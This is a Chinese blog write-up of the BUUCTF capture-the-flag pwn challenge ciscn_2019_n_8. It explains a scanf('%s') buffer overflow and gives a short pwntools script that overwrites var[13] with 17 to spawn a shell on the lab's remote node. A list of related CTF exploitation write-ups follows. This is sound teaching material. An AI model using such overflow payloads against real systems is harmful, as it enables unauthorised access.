BUUCTF pwn基础学习——ciscn_2019_n_81

最新推荐文章于 2025-05-27 16:30:50 发布
最新推荐文章于 2025-05-27 16:30:50 发布
阅读量359 收藏 1
点赞数 9
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88083440/article/details/146112481
版权

还是得写一篇来帮助自己更加清晰地了解pwn的一些机制。

首先check一下该程序的基本信息

发现这里是32位小端序,并且开启了很多保护,将文件拖入ida32看看

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}

system函数可以很明显地看到,但需要符合上面的if条件,使 *(_QWORD *)&var[13]==17LL 成立

(1)_QWORD 是64位(bit)类型,对应8个字节(byte)(因为 1byte=8bit )这里是将var数组的第13个元素 开始的8个字节 作为一个64位的整数进行读取。

(2)&var[13] 表示获取var数组中第13个元素的内存地址,这个地址指向了该元素在内存中的起始位置。

(3)(_QWORD *)&var[13] 使用了强制类型转换,将var[13]得到的地址强制转换为 _QWORD 类型的指针。这意味着,把从 var[13] 开始的内存区域当做一个64位(8字节)的整体来处理。

但var数组的一个元素占 4个字节,所以从 var[13] 开始,var[13]和var[14] 需要组合为 17LL

构造输入时需要覆盖 var[13]为17 var[14]为0(但var[14]一开始就已经是0了)所以只需要覆盖var[13]为17就可以了。

再来看看可以怎样进行覆盖

  __isoc99_scanf("%s", var, v4, v5);

 这里的 %s 格式说明符没有指定最大输入长度,如果用户输入的字符串长度超过了 var 数组所分配的内存空间,scanf 会继续将多余的字符写入到 var 数组后面的内存区域

 所以我们可以这样进行覆盖:

1. var[0] 到 var[12] 占据前 13*4=52 字节

2.构造输入覆盖 var[13] 为17

from pwn import  *
p=remote("node5.buuoj.cn",27754)
payload=b'A'*(13*4)+p32(17)
p.sendline(payload)
p.interactive()

 

 

 

c30%00
关注
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 675
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1127
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
BUUCTF-PWN】11-ciscn_2019_c_1
燕麦葡萄干的博客
07-05 1106
再利用pop_rdi;ret语句进行将下一层值推入寄存器rdi中作为参数,本次payload构建目的在于利用puts函数泄露本身的真实地址,从而获取Libc基址,所以将puts_got作为参数,运行函数地址为puts_plt,即用puts来打印出Puts_got的地址,最后再返回start函数重新运行,在后续中再次利用libc的基址找出system以及“bin/sh”的地址,从而构建第二次payload,要注意的是由于靶机是Ubuntu,所以要构建栈平衡,第二次payload需要加入ret。
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 383
BUUCTF 做题练习
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 582
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF-PWN】9-ciscn_2019_n_8
燕麦葡萄干的博客
07-05 406
4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节。不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools。32位,开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 1263
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 1119
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 783
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 8437
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2373
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
buuctf pwn刷题(1)
清霂的博客
01-30 1259
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
buuctf中的一些pwn题总结(不断更新)
PLpa的博客
08-19 4753
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn题,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解题思路 由于此题存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
卫星姿态描述基础知识学习记录(部分)
最新发布
qq_40509664的博客
05-27 167
相对姿态(坐标系旋转)的描述:假设目标的坐标系为B,参考坐标系为R,对目标的姿态描述即确定目标坐标系与参考坐标系的关系。由于目标坐标系一般固结在目标上,这样便实现了目标的相对姿态描述。描述方式主要有:方向余弦式、欧拉轴/角式、欧拉角式、姿态四元数;由于姿态可唯一确定,这些描述方式间可相互转换。
Android内存调优学习总结(OOM与ANR)
2301_80329517的博客
05-23 889
OOM和ANR学习总结
从0开始学习R语言--Day09--方差分析
Chef_Chen的博客
05-26 246
前两天我们学习了T检验来判断两组数据之间的差异是显著存在还是因为偶然,但如果存在多组数据,我们还是两两去对比作T检验的话,会存在假阳性(也就是把没有差异判断为有差异),虽然每次单独的T检验只有5%,但即使数据只是多了三组,也要作三次T检验,假阳性的概率就被叠加到了大概14%。
vite学习笔记
zxz86的博客
05-23 791
现代浏览器项目(Chrome >=61, Firefox >=60, Safari >=11)assetsInlineLimit: 4096, // 4KB以下资源内联。框架新项目(Vue3/React18/Svelte)极速启动:冷启动时间比传统工具快 10-100 倍。闪电热更新:HMR 更新速度不受项目规模影响。智能构建:生产环境使用 Rollup 打包。库开发(利用 Rollup 的纯净打包).scss/.less 直接导入。微前端子应用(快速加载需求)模拟 CommonJS。
Open CASCADE学习|非线性方程组求解技术详解
T20151470的博客
05-23 881
继承,实现方程组的函数值及雅可比矩阵计算。// 定义非线性方程组:x² + y² = 1 和 x = ypublic:// 变量数(x和y)// 方程数// 计算函数值 F = [x² + y² - 1, x - y]// 计算雅可比矩阵// 第一行偏导: [2x, 2y]// 第二行偏导: [1, -1]// 同时计算函数值与雅可比矩阵关键点:索引规范:OCC的和默认从1开始索引。雅可比矩阵:显式提供解析导数可提升收敛速度,避免数值差分引入的误差。
《大模型应用开发:动手做AI Agent 》学习大纲
kovlistudio的博客
05-26 532
《大模型应用开发:动手做AI Agent 》学习大纲
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值